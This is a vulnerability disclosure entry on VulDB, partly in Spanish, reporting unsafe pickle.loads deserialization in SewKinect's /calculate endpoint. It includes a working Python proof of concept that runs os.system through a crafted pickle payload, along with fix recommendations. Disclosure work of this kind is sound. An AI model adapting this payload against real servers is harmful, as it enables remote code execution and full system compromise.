Enviar #653270: SewKinect latest OS Command Injectioninformación

TítuloSewKinect latest OS Command Injection
Descripción# Remote Code Execution Vulnerability in /calculate Endpoint ### Summary The `/calculate` endpoint in the application is vulnerable to Remote Code Execution (RCE) due to unsafe deserialization using Python's `pickle.loads` on user-supplied data. ### Details - The endpoint accepts POST requests with form fields `body_parts` and `point_cloud`. - These fields are base64-encoded pickled objects, which are decoded and deserialized using `pickle.loads` without validation. - Python's `pickle` module is inherently unsafe for deserializing untrusted data, as it can execute arbitrary code during the loading process. - An attacker can craft a malicious pickle payload to execute arbitrary system commands on the server. ## PoC - Run Server ```shell python app.py ``` - Run poc.py ```Python import pickle import base64 import requests class Payload(object): def __reduce__(self): import os return (os.system, ('echo "PWNED"',)) def poc(): payload = pickle.dumps(Payload()) resp = requests.post( "http://127.0.0.1:5000/calculate", headers={"Content-type": "application/x-www-form-urlencoded"}, data={ "body_parts": base64.b64encode(payload).decode(), "point_cloud": base64.b64encode(pickle.dumps(None)).decode() } ) print(resp.status_code, resp.text) if __name__ == "__main__": poc() ``` ### Impact Successful exploitation allows attackers to execute arbitrary code on the server, potentially leading to full system compromise, data theft, or service disruption. ### Recommendation - Never use `pickle.loads` on data from untrusted sources. - Replace pickle with a safe serialization format such as JSON. - Validate and sanitize all user inputs. ### References - [Python pickle documentation (Security Considerations)](https://docs.python.org/3/library/pickle.html#security-concerns) - [OWASP: Deserialization of Untrusted Data](https://owasp.org/www-community/vulnerabilities/Deserialization_of_untrusted_data)
Fuente⚠️ https://github.com/giantspatula/SewKinect/issues/3
Usuario
 zznQ (UID 64000)
Sumisión2025-09-12 07:19 (hace 8 meses)
Moderación2025-09-25 16:10 (13 days later)
EstadoAceptado
Entrada de VulDB325845 [giantspatula SewKinect hasta 7fd963ceb3385af3706af02b8a128a13399dffb1 Endpoint /calculate pickle.loads body_parts/point_cloud escalada de privilegios]
Puntos20

AnteriorVisión De ConjuntoPróximo

Might our Artificial Intelligence support you?

Check our Alexa App!